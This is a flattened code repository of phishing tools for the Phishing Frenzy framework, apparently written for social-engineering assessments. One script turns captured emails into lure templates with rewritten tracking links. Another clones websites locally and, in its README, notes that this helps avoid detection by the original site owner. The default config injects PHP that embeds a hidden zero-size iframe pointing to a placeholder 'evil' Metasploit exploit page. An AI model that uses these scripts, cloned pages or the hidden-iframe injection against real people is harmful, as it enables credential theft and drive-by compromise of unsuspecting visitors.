├── .gitignore
├── README.md
├── config
│   └── website_cloner.default
├── eml_to_html.py
└── website_cloner.py
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | .project
3 | .pydevproject
4 | *.pyc
5 | *.cfg
6 | *.config
7 | *.bak
8 | /output/*
9 | /tmp/*
10 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | phishing-tools
2 | =======
3 |
4 | Scripts to assist in generating social engineering campaigns with the
5 | Phishing Frenzy phishing framework.
6 |
7 | -------------------------------------------------------------------------------
8 | Matthew C. Jones, CPA, CISA, OSCP
9 |
10 | IS Audits and Consulting, LLC -
11 |
12 | TJS Deemer Dana -
13 |
14 | -------------------------------------------------------------------------------
15 | ### eml_to_html.py
16 | Converts an email in .eml format into HTML suitable for
17 | importing into a Phishing Frenzy campaign. Provides options to replace all links
18 | with Phishing Frenzy URL tags and to embed the tracking image tag. Also
19 | provides the option to download all linked images locally and rewrite
20 | those links, which is useful in the event that the original links break.
21 | Output is in .erb format, which should be uploaded as the "email," with any
22 | additional images uploaded as "attachments."
23 |
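For reference, here is a minimal sketch of the link-rewriting step the script performs (Python 2 with BeautifulSoup 3, matching the script's own imports; the sample HTML is just a placeholder):

```python
# Rewrite every <a href> to the Phishing Frenzy URL erb tag, as eml_to_html.py does.
from BeautifulSoup import BeautifulSoup  # BeautifulSoup 3, same import the script uses

html = '<html><body><a href="http://example.com/login">Log in</a></body></html>'
soup = BeautifulSoup(html)
for a in soup.findAll('a'):
    a['href'] = '<%= @url %>'  # Phishing Frenzy substitutes the campaign URL for this tag
print soup.prettify()
```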
24 |
25 | ### website_cloner.py
26 | Scrapes a website and downloads its content, including
27 | images, to a local folder in a format suitable for uploading into a Phishing
28 | Frenzy campaign. Also downloads all linked images, CSS, etc. locally in case
29 | the original links break. This also reduces the chance of the original site
30 | owner detecting that the site has been cloned, since you are not hotlinking
31 | assets from the original site. Output is an index.php file and any additional
32 | images, CSS, etc., all of which should be uploaded as "website."
33 |
34 | Note that some manual cleanup is required to make sure the linked CSS and
35 | scripts are referenced properly. Also note that not all of the downloaded scripts
36 | are necessary for the site to function properly, and some may contain tracking
37 | code.
38 |
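As a rough illustration of what the cloner does for each asset type (images, stylesheets, scripts), here is a condensed sketch of one download-and-rewrite pass, using the same Python 2 / BeautifulSoup 3 / urllib2 stack as the script. The target URL is a placeholder, and the sketch rewrites each tag directly rather than using the whole-document string replace the script performs:

```python
# Fetch a page, point each <img> at a bare local filename, and download the
# original asset next to the cloned page (simplified version of website_cloner.py).
import urllib2
from BeautifulSoup import BeautifulSoup

site_addr = 'http://example.com/'  # placeholder target site
soup = BeautifulSoup(urllib2.urlopen(site_addr, timeout=5).read())

for tag in soup.findAll('img', src=True):
    url = tag['src']
    filename = url.split('/')[-1].split('#')[0].split('?')[0]  # strip path/fragment/query
    tag['src'] = filename                                      # reference the local copy
    if not url.startswith('http'):
        url = urllib2.urlparse.urljoin(site_addr, url)         # resolve relative links
    open(filename, 'wb').write(urllib2.urlopen(url, timeout=5).read())

open('index.php', 'wb').write(soup.prettify())
```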
39 | -------------------------------------------------------------------------------
40 | ### Other notes
41 |
42 | These scripts are a work in progress, particularly the website_cloner - each time
43 | we use it on a new site there is some small nuance or tweak to figure out.
44 | Please feel free to submit suggestions, modifications, or pull requests.
45 | Community contribution is greatly appreciated!
46 |
47 | Phishing Frenzy can be downloaded at
48 |
49 | -------------------------------------------------------------------------------
50 |
51 | ### License
52 |
53 | Unless otherwise specified, scripts are licensed under the GPL:
54 |
55 | This program is free software: you can redistribute it and/or modify it under
56 | the terms of the GNU General Public License as published by the Free Software
57 | Foundation, either version 3 of the License, or (at your option) any later
58 | version.
59 |
60 | This program is distributed in the hope that it will be useful, but WITHOUT ANY
61 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
62 | PARTICULAR PURPOSE. See the GNU General Public License for more details.
63 |
64 | You should have received a copy of the GNU General Public License along with
65 | this program. If not, see <http://www.gnu.org/licenses/>.
--------------------------------------------------------------------------------
/config/website_cloner.default:
--------------------------------------------------------------------------------
1 | [general]
2 | working_dir = output/
3 |
4 | ################################################################################
5 | # The HTML section below allows the user to specify additional HTML code that
6 | # should be inserted in the head and body of the html page. The example below
7 | # adds PHP code to embed an invisible iframe containing executable content such
8 | # as a meterpreter java applet.
9 | #
10 | # NOTE - in order for the config parser to correctly parse multi-line values,
11 | # they must be indented with a tab or space (even a blank line must start with
12 | # a tab or space).
13 | #
14 | # If you get a parsing error that looks like this with \n at the end of the
15 | # error lines, that is likely the problem:
16 | #
17 | # ParsingError: File contains parsing errors: config/website_cloner.config
18 | # [line 12]: '}\n'
19 | ################################################################################
20 |
21 | [html]
22 |
23 | header_text:
24 | <?php
25 | //code for embedding msf exploit page; embedded text is inserted in html body
26 | $use_msf = true;
27 | $msf_url = 'https://path/to/my/evil/exploit/page/index.html';
28 | if ($use_msf == true){
29 | $msf_imbed = '<iframe src="' . $msf_url . '" width="0" height="0" frameborder="0"></iframe>';
30 | }
31 | ?>
32 |
33 | body_text:
34 | <?php echo $msf_imbed ?>
--------------------------------------------------------------------------------
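For context on the config format above: website_cloner.py reads these values with Python 2's ConfigParser, which is why the multi-line [html] values must keep their leading whitespace. A minimal sketch of the read side, using the config path the script hardcodes:

```python
# Read the [general] and [html] values the way website_cloner.py does.
import ConfigParser

config = ConfigParser.SafeConfigParser()
config.read("config/website_cloner.config")       # path the script expects

working_dir = config.get("general", "working_dir")
header_text = config.get("html", "header_text")   # multi-line value returned with newlines
body_text = config.get("html", "body_text")
print header_text
```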
/eml_to_html.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | @author: Matthew C. Jones, CPA, CISA, OSCP
5 | IS Audits & Consulting, LLC
6 | TJS Deemer Dana LLP
7 |
8 | Parses an .eml file into separate files suitable for use with phishing frenzy
9 | '''
10 |
11 | import sys
12 | import argparse
13 | import email
14 | import os
15 | from BeautifulSoup import BeautifulSoup
16 | import urllib
17 |
18 | # encoding=utf8
19 | reload(sys)
20 | sys.setdefaultencoding('utf8')
21 |
22 | def main(argv):
23 |
24 | parser = argparse.ArgumentParser(description='Convert an .eml file into an html file suitable for use with phishing frenzy.')
25 | parser.add_argument("infile", action="store", help="Input file")
26 |
27 | args = parser.parse_args()
28 |
29 | inputfile = open(args.infile, "rb")
30 |
31 | #See if this will be used for phishing frenzy or as a standalone attack
32 | #Yes option will use phishing-frenzy tags and check for additional options
33 | global phishing_frenzy
34 | phishing_frenzy = False
35 | global replace_links
36 | replace_links = False
37 | global imbed_tracker
38 | imbed_tracker = False
39 |
40 | phishing_frenzy = raw_input("\nShould links and images be formatted for use in phishing frenzy? [yes]")
41 | if not ("n" in phishing_frenzy or "N" in phishing_frenzy):
42 | phishing_frenzy = True
43 | replace_links = raw_input("\nWould you like to replace all links with phishing-frenzy tags? [yes]")
44 | if not ("n" in replace_links or "N" in replace_links):
45 | replace_links = True
46 | imbed_tracker = raw_input("\nWould you like to imbed the phishing-frenzy tracking image tag? [yes]")
47 | if not ("n" in imbed_tracker or "N" in imbed_tracker):
48 | imbed_tracker = True
49 |
50 | #change working directory so we are in same directory as input file!
51 | os.chdir(os.path.dirname(os.path.abspath(inputfile.name)))   #abspath so a bare filename still yields a valid directory
52 |
53 | message = email.message_from_file(inputfile)
54 |
55 | extract_payloads(message)
56 |
57 |
58 | def extract_payloads(msg):
59 | if msg.is_multipart():
60 | #message / section is multi-part; loop part back through the extraction module
61 | print "Multi-part section encountered; extracting individual parts from section..."
62 | for part in msg.get_payload():
63 | extract_payloads(part)
64 | else:
65 | sectionText=msg.get_payload(decode=True)
66 | contentType=msg.get_content_type()
67 | filename=msg.get_filename() #this is the filename of an attachment
68 |
69 | #sectionText = sectionText.encode('utf-8').decode('ascii', 'ignore')
70 | soup = BeautifulSoup(sectionText)
71 |
72 | if contentType=="text/html":
73 | print "Processing HTML section..."
74 |
75 | ########################################
76 | #replace links with phishing frenzy tags
77 | ########################################
78 | if replace_links==True:
79 | for a in soup.findAll('a'):
80 | a['href'] = '<%= @url %>'
81 |
82 | ###############################################
83 | #Detect hyperlinked images and download locally
84 | ###############################################
85 | imageList = []
86 |
87 | for tag in soup.findAll('img', src=True):
88 | imageList.append(tag['src'])
89 |
90 | if not imageList:
91 | pass
92 | else:
93 | print "The following linked images were detected in the HTML:"
94 | for url in imageList:
95 | print url
96 |
97 | download_images = raw_input("\nWould you like to download these and store locally? [yes]")
98 |
99 | if not ("n" in download_images or "N" in download_images):
100 | print "Downloading images..."
101 | for url in imageList:
102 | try:
103 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
104 | open(filename,"wb").write(urllib.urlopen(url).read())
105 |
106 | #Does not appear that using PF attachment tag is necessary; just use filename?!?
107 | if phishing_frenzy==True:
108 | pass
109 | #filename = "<%= image_tag attachments['"+filename+"'].url %>"
110 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
111 | except:
112 | print "Error processing " + url + " - skipping..."
113 |
114 | if imbed_tracker == True:
115 | soup.body.insert(len(soup.body.contents), '<%= image_tag %>')   #append the phishing frenzy tracking image erb tag to the end of the body
116 |
117 | ##########################################
118 | #Clean up html output and make it readable
119 | ##########################################
120 | sectionText = soup.prettify()
121 | sectionText = sectionText.replace('&lt;','<')   #un-escape the erb tags that prettify() encoded
122 | sectionText = sectionText.replace('&gt;','>')
123 |
124 | print sectionText
125 |
126 | if phishing_frenzy==True:
127 | export_part(sectionText,"email.html.erb")
128 | else:
129 | export_part(sectionText,"email.html")
130 |
131 | elif contentType=="text/plain":
132 | ##TODO: Need to fix link cleanup of text section; beautiful soup doesn't replace hyperlinks in text file!
133 | print "Processing text section..."
134 |
135 | if phishing_frenzy==True:
136 | export_part(sectionText,"email.txt.erb")
137 | else:
138 | export_part(sectionText,"email.txt")
139 |
140 | elif filename:
141 | print "Processing attachment "+filename+"..."
142 | export_part(sectionText,filename)
143 | else:
144 | print "section is of unknown type ("+str(contentType)+")...skipping..."
145 |
146 |
147 | def export_part(sectionText,filename):
148 | open(filename,"wb").write(sectionText)
149 |
150 |
151 | if __name__ == "__main__":
152 | main(sys.argv[1:])
153 |
--------------------------------------------------------------------------------
/website_cloner.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | '''
4 | @author: Matthew C. Jones, CPA, CISA, OSCP
5 | IS Audits & Consulting, LLC
6 | TJS Deemer Dana LLP
7 |
8 | Downloads a website into a format suitable for use with phishing frenzy
9 | '''
10 |
11 | import sys
12 | import argparse
13 | import os
14 | import shutil
15 | from BeautifulSoup import BeautifulSoup, NavigableString
16 | import urllib2
17 | import ConfigParser
18 |
19 | def main(argv):
20 |
21 | parser = argparse.ArgumentParser(description='Downloads a website into a format suitable for use with phishing frenzy')
22 | parser.add_argument("site_addr", action="store", help="Site address")
23 |
24 | args = parser.parse_args()
25 | site_addr = args.site_addr
26 |
27 | #########################################
28 | #Get stuff from config file
29 | #########################################
30 | config_file = "config/website_cloner.config"
31 | if os.path.exists(config_file):
32 | pass
33 | else:
34 | try:
35 | print "Specified config file not found. Copying example config file..."
36 | shutil.copyfile("config/website_cloner.default", config_file)
37 | except:
38 | print "Error copying default config file...quitting execution..."
39 | sys.exit()
40 |
41 | config = ConfigParser.SafeConfigParser()
42 | config.read(config_file)
43 |
44 | try:
45 | working_dir = config.get("general", "working_dir")
46 | header_text = config.get("html", "header_text")
47 | body_text = config.get("html", "body_text")
48 |
49 | except:
50 | print "Missing required config file sections. Check running config file against provided example\n"
51 | sys.exit()
52 |
53 | site_path = site_addr.replace("http://","")
54 | site_path = site_path.replace("https://","")
55 | working_dir = os.path.join(working_dir, site_path,'')
56 | if not os.path.exists(working_dir):
57 | os.makedirs(working_dir)
58 |
59 | os.chdir(os.path.dirname(working_dir))
60 |
61 | #########################################
62 | #Get the site we are cloning
63 | #########################################
64 |
65 | if not site_addr[:4] == "http":
66 | site_addr = "http://"+site_addr
67 |
68 | try:
69 | site_text=urllib2.urlopen(site_addr).read()
70 | except:
71 | print "Could not open site...quitting..."
72 | sys.exit()
73 |
74 | #soup=BeautifulSoup(header_text+site_text)
75 | soup=BeautifulSoup(site_text)
76 | head=soup.find('head')
77 | head.insert(0,NavigableString(header_text))
78 | body=soup.find('body')
79 | body.insert(0,NavigableString(body_text))
80 |
81 | ###############################################
82 | #Detect hyperlinked images and download locally
83 | ###############################################
84 | imageList = []
85 |
86 | for tag in soup.findAll('img', src=True):
87 | imageList.append(tag['src'])
88 |
89 | if not imageList:
90 | pass
91 | else:
92 | for url in imageList:
93 | try:
94 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
95 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
96 |
97 | if not url.startswith('http'):
98 | url = urllib2.urlparse.urljoin(site_addr,url)
99 | print "getting " + url + "..."
100 |
101 | open(filename,"wb").write(urllib2.urlopen(url, timeout=5).read())
102 | except:
103 | pass
104 |
105 | cssList = []
106 |
107 | for tag in soup.findAll('link', {'rel':'stylesheet'}):
108 | cssList.append(tag['href'])
109 |
110 | if not cssList:
111 | pass
112 | else:
113 | for url in cssList:
114 | try:
115 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
116 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
117 |
118 | if not url.startswith('http'):
119 | url = urllib2.urlparse.urljoin(site_addr,url)
120 | print "getting " + url + "..."
121 |
122 | open(filename,"wb").write(urllib2.urlopen(url, timeout=5).read())
123 | except:
124 | pass
125 |
126 | scriptList = []
127 |
128 | for tag in soup.findAll('script', src=True):
129 | scriptList.append(tag['src'])
130 |
131 | if not scriptList:
132 | pass
133 | else:
134 | for url in scriptList:
135 | try:
136 | filename = url.split('/')[-1].split('#')[0].split('?')[0]
137 | soup = BeautifulSoup(str(soup).decode("UTF-8").replace(url,filename).encode("UTF-8"))
138 |
139 | if not url.startswith('http'):
140 | url = urllib2.urlparse.urljoin(site_addr,url)
141 | print "getting " + url + "..."
142 |
143 | open(filename,"wb").write(urllib2.urlopen(url, timeout=5).read())
144 | except:
145 | pass
146 |
147 | ##########################################
148 | #Clean up html output and make it readable
149 | ##########################################
150 | mainpage = soup.prettify()
151 | mainpage = mainpage.replace('&lt;','<')   #un-escape the php/erb markup that prettify() encoded
152 | mainpage = mainpage.replace('&gt;','>')
153 |
154 | open("index.php","wb").write(mainpage)
155 |
156 | if __name__ == "__main__":
157 | main(sys.argv[1:])
158 |
--------------------------------------------------------------------------------